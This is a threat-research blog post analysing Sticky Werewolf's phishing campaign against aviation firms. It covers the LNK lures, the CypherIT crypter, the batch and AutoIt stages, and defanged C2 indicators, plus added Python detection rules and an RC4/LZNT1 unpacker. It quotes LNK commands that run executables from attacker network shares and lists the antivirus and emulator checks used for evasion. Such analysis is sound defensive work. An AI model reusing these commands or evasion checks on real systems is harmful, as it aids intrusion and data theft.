
URL: https://blog.morphisec.com/sticky-werewolfs-aviation-attacks
Submission: On June 10 via api from IN — Scanned from DE

Cybersecurity Blog

Cybersecurity News, Threat Research, and more from the Team Spearheading the
Evolution of Endpoint Security


HOWLING AT THE INBOX: STICKY WEREWOLF'S LATEST MALICIOUS AVIATION ATTACKS

Posted by Arnold Osipov on June 6, 2024


Morphisec Labs has been monitoring increased activity associated with Sticky
Werewolf, a group suspected to have geopolitical and/or hacktivist ties. While
the group’s geographical origin and home base remain unclear, recent attack
techniques suggest espionage and data exfiltration intent.  




INTRODUCTION

Sticky Werewolf is a cyber threat group first detected in April 2023; early
activities primarily targeted public organizations in Russia and Belarus. The
group’s operations have since extended to several sectors, targeting a
pharmaceutical company, a Russian research institute dealing with microbiology
and vaccine development, and more.  

In their most recent campaign, Sticky Werewolf have targeted the aviation
industry with emails supposedly from the First Deputy General Director of AO OKB
Kristall (a Moscow-based company involved in the production and maintenance of
aircraft and spacecraft). In previous campaigns the group used phishing emails
with links to malicious files. This latest campaign used archive files
containing LNK files pointing to a payload stored on WebDAV servers. 

 


INFECTION CHAIN 

In previous campaigns, the infection chain began with phishing emails containing
a link to download a malicious file from platforms like gofile.io. However, in
their latest campaign, the infection method has changed.  

The initial email includes an archive attachment; when the recipient extracts
the archive, they find LNK and decoy files. These LNK files point to an
executable hosted on a WebDAV server. Once executed, this initiates a Batch
script, which then launches an AutoIt script that ultimately injects the final
payload. 




TECHNICAL ANALYSIS


PHISHING EMAIL

The phishing email, purportedly sent by the First Deputy General Director and
Executive Director of AO OKB Kristall, targets individuals in the aerospace and
defense sector.  

The email invites recipients to a video conference on future cooperation and
provides a password-protected archive that contains a malicious payload. It aims
to deceive recipients into opening the harmful attachment under the lure of a
legitimate business invitation.




EMAIL ATTACHMENT 

The initial archive delivered in the phishing email contains three files
designed to deceive the recipient into executing at least one of the malicious
email’s contents.  

The archive includes: 

 * A Decoy PDF File: This file serves as a distraction, providing seemingly
   legitimate content to reduce suspicion while the LNK files execute the
   malicious payload. 
   
 * Two LNK Files Masquerading as DOCX Documents:
   * Повестка совещания.docx.lnk (Meeting agenda): This file is intended to
     appear as a legitimate document outlining the meeting agenda. 
   * Список рассылки.docx.lnk (Mailing list): This file is disguised as a
     document containing the distribution list for the meeting. 
     


PDF

The PDF file, included as a decoy in the phishing archive, is an invitation to a
video conference organized by AO "OKB Kristall" with key enterprises of the
"Russian Helicopters" holding. The conference aims to discuss "Issues of
prospective cooperation 2024-2025." 

The PDF also references the two malicious LNK files as attachments, increasing
the likelihood of the recipient opening them. 

 * Meeting agenda (Повестка совещания.docx.lnk) 
 * Mailing list (Список рассылки.docx.lnk) 
   

 


LNKS 

Once the victim clicks the LNK files, the following actions will be triggered: 

FIRST LNK - ПОВЕСТКА СОВЕЩАНИЯ.DOCX.LNK (MEETING AGENDA) 

Executes a command that performs multiple actions:

 1. Registry Entry for Persistence: Adds a registry entry to run WINWORD.exe
    from a network share (\\94.156.8[.]166\Microsoft Office Word$\WINWORD.exe)
    on login.
 2. Decoy Message: Displays a message in Russian indicating a document opening
    error, claiming the file is corrupted.
 3. Copies image.jpg from another network share (\\79.132.128[.]47\image.jpg)
    to the local root directory. The file was unavailable at the time of
    research and is suspected to be used as a decoy.



SECOND LNK - СПИСОК РАССЫЛКИ.DOCX.LNK (MAILING LIST) 

Executes the command \\document-cdn[.]org\Microsoft Office Word$\WINWORD.exe,
which launches the same executable as the first LNK file, this time through a
domain name that resolved to the above IP (at the time of writing).

 


CYPHERIT LOADER / CRYPTER 

Once the victim clicks the LNK file, the executable from the network share
begins running. This executable is an NSIS self-extracting archive which is part
of a previously known crypter named CypherIT.  

This crypter has been used for several years to deliver malicious payloads in
various campaigns by multiple threat actors. While the original CypherIT crypter
is no longer being sold, the current executable is a variant of it, as observed
in a couple of hacking forums.

The NSIS archive extracts its files into the $INTERNET_CACHE directory, which
corresponds to %LocalAppData%\Microsoft\Windows\INetCache, and is typically used
for Internet Explorer's temporary files. After extraction, the installer runs
one of the files, an obfuscated batch script. 

 


BATCH SCRIPT 

This batch script performs several operations: 

 * Delay Execution: If wrsa.exe or opssvc.exe processes are running, the script
   delays execution by running ping -n 193 127.0.0.1. 
 * Change Filenames: If any of the following processes are present: avastui.exe,
   avgui.exe, nswscsvc.exe, sophoshealth.exe, the script changes the filenames
   for the next stage AutoIt executable and script file extension. 
 * File Concatenation: Concatenates multiple files into two files: 
   * A legitimate AutoIt executable. 
   * A compiled AutoIt script. 
 * Execute AutoIt: Runs the AutoIt executable, passing the compiled script as an
   argument. 

Process Name                     Vendor
-------------------------------  --------------------------
avastui.exe                      AVG Antivirus
avgui.exe                        AVG Antivirus
nswscsvc.exe                     Norton Security
opssvc.exe | sophoshealth.exe    Sophos Endpoint Protection
wrsa.exe                         Webroot

Table: Processes monitored by the Batch script and their corresponding security
vendors.
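The behaviours described in the LNK, CypherIT and Batch script sections can be turned into simple triage rules over endpoint telemetry. The following is an added example, not code from the original post: the events are constructed Sysmon-style records (process creation and registry value set) using documentation addresses, and the Run key location, file names and ping-count threshold are assumptions.

```python
import re

UNC_PATH = re.compile(r'^"?\\\\[^\\]+\\')          # \\host\share\...
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
INETCACHE = re.compile(r"\\Microsoft\\Windows\\INetCache\\", re.I)
LOOPBACK_PING = re.compile(r"\bping(?:\.exe)?\b.*?-n\s+(\d+)\s+127\.0\.0\.1", re.I)
PING_SLEEP_MIN = 30   # assumed threshold: a count this high is a delay, not a test


def classify(event: dict) -> list:
    """Return the names of the rules a single event matches."""
    hits = []
    if event["EventID"] == 1:                        # process creation
        image, cmdline = event["Image"], event["CommandLine"]
        if UNC_PATH.match(image):
            hits.append("exe_from_remote_share")     # LNK target on a network share
        if INETCACHE.search(image) or INETCACHE.search(cmdline):
            hits.append("runs_from_inetcache")       # NSIS extraction directory
        ping = LOOPBACK_PING.search(cmdline)
        if ping and int(ping.group(1)) >= PING_SLEEP_MIN:
            hits.append("loopback_ping_delay")       # batch-script stall
    elif event["EventID"] == 13:                     # registry value set
        if RUN_KEY.search(event["TargetObject"]) and UNC_PATH.match(event["Details"]):
            hits.append("run_key_to_remote_share")   # persistence on login
    return hits


def triage(events: list) -> list:
    """Return (index, rule names) for every event that matched at least one rule."""
    flagged = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            flagged.append((index, hits))
    return flagged


# Constructed sample events. Host, user and stage file names are made up.
SHARE = r"\\203.0.113.10\Microsoft Office Word$\WINWORD.exe"
CACHE = r"C:\Users\u\AppData\Local\Microsoft\Windows\INetCache"
RUN = r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": SHARE, "CommandLine": '"' + SHARE + '"'},
    {"EventID": 13, "TargetObject": RUN + r"\Word", "Details": SHARE},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c " + CACHE + r"\stage.cmd"},
    {"EventID": 1, "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -n 193 127.0.0.1"},
    {"EventID": 1, "Image": CACHE + r"\stage.exe",
     "CommandLine": "stage.exe stage.dat"},
    # Benign look-alikes that must not be flagged.
    {"EventID": 1, "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -n 4 127.0.0.1"},
    {"EventID": 13, "TargetObject": RUN + r"\Updater",
     "Details": r"C:\Program Files\App\updater.exe"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, hits)
```

Each rule on its own is a weak signal; several of them firing on one host in this order is what matches the chain described above.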


AUTOIT SCRIPT 

The executed AutoIt script has various capabilities such as anti-analysis,
anti-emulation, persistence, and unhooking. Its main goal is to inject the
payload and establish persistence while evading security solutions and analysis
attempts.

ANTI-ANALYSIS AND ANTI-EMULATION 

The script checks for artifacts or signs belonging to security vendors'
emulators and environments: 



Artifact-Type    Value                     Vendor
---------------  ------------------------  -------------------------
Computer Name    tz                        BitDefender Emulator
Computer Name    NfZtFbPfH                 Kaspersky Emulator
Computer Name    ELICZ                     AVG Emulator
Username         test22
Process name     avastui.exe               AVG Antivirus
File Name        C:\aaa_TouchMeNot_.txt    Windows Defender Emulator
Process Name     bdagent.exe               Bitdefender
Process Name     avp.exe                   Kaspersky

 

The script then overwrites the loaded ntdll.dll: it maps a clean copy from disk
and replaces the .text section of the loaded module, a known technique for
removing hooks.

PERSISTENCE 

Persistence is established via a scheduled task or the startup directory. 

DECRYPTION AND INJECTION 

Before injecting the payload, it decrypts it using two shellcodes that perform
RC4 decryption. 

 1. The first shellcode performs the key scheduling algorithm using the provided
    passphrase. 
 2. The second shellcode implements the PRGA of the RC4 stream cipher. 



The decrypted bytes are decompressed using RtlDecompressFragment with
COMPRESSION_FORMAT_LZNT1. The final payload is then injected using process
hollowing into a legitimate AutoIt process.
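For analysts who want to recover the payload statically, the two RC4 stages and the LZNT1 step can be reproduced off-host. This is an added example, not code from the original post or from the malware: it assumes the decrypted blob is a plain LZNT1 stream with no extra framing, and the passphrase and sample bytes are constructed.

```python
import struct


def rc4_ksa(passphrase: bytes) -> list:
    """First stage on the page: key scheduling over the passphrase."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + passphrase[i % len(passphrase)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_prga(state: list, data: bytes) -> bytes:
    """Second stage: generate the keystream and XOR it over the data."""
    s, i, j, out = state[:], 0, 0, bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def lznt1_decompress(blob: bytes) -> bytes:
    """Decode an LZNT1 stream: 2-byte chunk headers, flag bytes, 16-bit tokens."""
    out, pos = bytearray(), 0
    while pos + 2 <= len(blob):
        (header,) = struct.unpack_from("<H", blob, pos)
        if header == 0:                       # terminator or padding
            break
        end = pos + 3 + (header & 0x0FFF)     # 2-byte header + (size field + 1)
        if end > len(blob):
            raise ValueError("truncated LZNT1 chunk")
        pos += 2
        if not header & 0x8000:               # chunk stored uncompressed
            out += blob[pos:end]
            pos = end
            continue
        chunk_start = len(out)
        while pos < end:
            flags = blob[pos]
            pos += 1
            for bit in range(8):
                if pos >= end:
                    break
                if not (flags >> bit) & 1:    # literal byte
                    out.append(blob[pos])
                    pos += 1
                    continue
                if pos + 2 > end:
                    raise ValueError("truncated LZNT1 token")
                (token,) = struct.unpack_from("<H", blob, pos)
                pos += 2
                written = len(out) - chunk_start
                # The offset/length split of the token moves as the chunk grows.
                shift, span = 12, written - 1
                while span >= 0x10:
                    span >>= 1
                    shift -= 1
                length = (token & ((1 << shift) - 1)) + 3
                offset = (token >> shift) + 1
                if offset > written:
                    raise ValueError("back-reference before chunk start")
                for _ in range(length):       # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def unpack(passphrase: bytes, encrypted: bytes) -> bytes:
    """RC4-decrypt, then LZNT1-decompress, in the order the page describes."""
    return lznt1_decompress(rc4_prga(rc4_ksa(passphrase), encrypted))


# Constructed sample: one compressed LZNT1 chunk that expands to b"abcabcabc",
# encrypted with a made-up passphrase. Neither value comes from a real sample.
LZNT1_SAMPLE = bytes.fromhex("05b0086162630320")
PASSPHRASE = b"constructed-passphrase"
ENCRYPTED_SAMPLE = rc4_prga(rc4_ksa(PASSPHRASE), LZNT1_SAMPLE)
```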

 


CONCLUSION 

The injected payloads typically include commodity RATs or stealers. Recently,
Sticky Werewolf has utilized Rhadamanthys Stealer and Ozone RAT in their
campaigns. Previously, the group deployed MetaStealer, DarkTrack, and NetWire,
among others. These malware families facilitate extensive espionage and data
exfiltration.

While there is no definitive evidence pointing to a specific national origin for
the Sticky Werewolf group, the geopolitical context suggests possible links to a
pro-Ukrainian cyberespionage group or hacktivists, but this attribution remains
uncertain. 

 


HOW MORPHISEC HELPS 

Morphisec's Automated Moving Target Defense (AMTD) effectively stops attacks
like those used by the Sticky Werewolf group, which typically include commodity
RATs or stealers, at various stages of the attack chain.

Morphisec doesn’t rely on signature or behavioral patterns. Instead, it uses its
patented AMTD technology to prevent the attack at its earliest stages,
preemptively blocking attacks on memory and applications, and effectively
remediating the need for response.  

Schedule a demo today to see how Morphisec stops Sticky Werewolf and other new
emerging threats.   




IOCS 


C2 

 * 79.132.128[.]47 
 * 94.156.8[.]166 
 * document-cdn[.]org 
 * 94.156.8[.]211 

